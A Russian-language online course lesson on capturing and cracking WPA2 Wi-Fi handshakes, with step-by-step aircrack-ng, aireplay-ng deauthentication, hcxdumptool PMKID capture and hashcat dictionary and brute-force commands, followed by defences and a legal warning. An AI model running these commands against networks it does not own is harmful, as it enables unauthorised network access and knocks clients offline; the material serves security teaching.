Перехват и взлом рукопожатия WPA2
Перехватывайте четырёхэтапное рукопожатие с помощью aircrack-ng и выполняйте словарные атаки с Hashcat.
«Перехват и взлом рукопожатия WPA2» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Четырёхстороннее рукопожатие
Когда клиент подключается к сети WPA2, четырёхстороннее рукопожатие выводит парный временный ключ (PTK) из PMK (полученного из PSK) и случайных одноразовых значений. Перехват этого рукопожатия позволяет автономно подбирать пароль.
Настройка режима монитора
Режим монитора позволяет беспроводной карте перехватывать все кадры независимо от их назначения — это необходимо для пассивного перехвата рукопожатия. Режим работает только с картами, которые его поддерживают.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killПассивный перехват рукопожатия
Айродамп-нг пассивно перехватывает кадры. Дождитесь, пока клиент подключится естественным образом, или принудительно инициируйте повторное подключение с помощью деаутентификации. Информация о перехваченном рукопожатии отображается в правом верхнем углу вывода Айродамп-нг.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...Атака деаутентификацией
Отправка поддельных кадров деаутентификации заставляет подключённых клиентов отключиться и подключиться снова, инициируя новый перехват рукопожатия. Такая атака заметна и обнаруживаема, а клиент должен находиться в зоне действия.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)Атака PMKID: клиент не требуется
Атака PMKID с помощью утилиты хксдамптул извлекает PMKID из маяковых кадров и кадров зондирования, не требуя подключённого клиента. Получить данные можно быстрее, а подобрать их столь же возможно, как и данные полного рукопожатия.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtВзлом рукопожатия с помощью Хэшкэта
Преобразуйте файл перехвата и выполните атаку с помощью режима 22000 Хэшкэта (унифицированный формат WPA2) или режима 2500 (устаревший формат). Для наилучшего результата используйте rockyou.txt вместе с правилами.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dВзлом с помощью Эйркрак-нг
Эйркрак-нг выполняет подбор WPA2 с использованием CPU непосредственно по файлу перехвата. Это медленнее, чем подбор на GPU с помощью Хэшкэта, зато преобразование формата не требуется.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capСтратегия использования словарей
Успех подбора пароля WPA2 полностью зависит от качества словаря. Используйте: rockyou.txt как основу, наборы правил Хэшкэта для преобразований, словари, составленные специально для компании (имя+год+символ), и целевые списки, полученные с помощью OSINT.
Реальные сроки взлома
Случайный пароль WPA2 длиной 20 и более символов практически невозможно подобрать вычислительно. Подбор реалистичен только для коротких паролей или паролей на основе словаря. Поэтому длина и случайность пароля важнее правил, требующих сложной комбинации символов.
Защита
Используйте WPA3-SAE, устойчивый к автономной атаке по словарю, либо WPA2 с случайной парольной фразой длиной 20 и более символов, а также WPA2 для корпоративных сетей с EAP-TLS — сертификатами вместо паролей.
Правовое напоминание
Перехват рукопожатий WPA2 в сетях, которыми вы не владеете, незаконен. Все описанные здесь методы применяйте только в собственных тестовых сетях или авторизованных лабораторных средах, например в домашней лаборатории или выделенной тестовой точке доступа.
Быстрая проверка
Что улучшает атака PMKID по сравнению со стандартным перехватом рукопожатия?
Сводка: взлом WPA2
Перехват рукопожатия WPA2 или PMKID превращает взлом Wi-Fi в автономную атаку по словарю. Успех полностью зависит от надёжности пароля: короткие пароли и пароли на основе словаря быстро подбираются, а длинные случайные пароли практически невозможно взломать. Защищайтесь с помощью WPA3-SAE, надёжных парольных фраз и WPA2 для корпоративных сетей.
Часто задаваемые вопросы
Урок «Перехват и взлом рукопожатия WPA2» бесплатный?
Да — полный текст урока «Перехват и взлом рукопожатия WPA2» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Перехват и взлом рукопожатия WPA2»?
Перехватывайте четырёхэтапное рукопожатие с помощью aircrack-ng и выполняйте словарные атаки с Hashcat. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.
Сколько времени занимает урок «Перехват и взлом рукопожатия WPA2»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Протоколы безопасности 802.11: WEP, WPA2, WPA3
- Перехват и взлом рукопожатия WPA2
- Атаки Evil Twin и поддельного портала авторизации
- Корпоративный Wi-Fi: EAP и RADIUS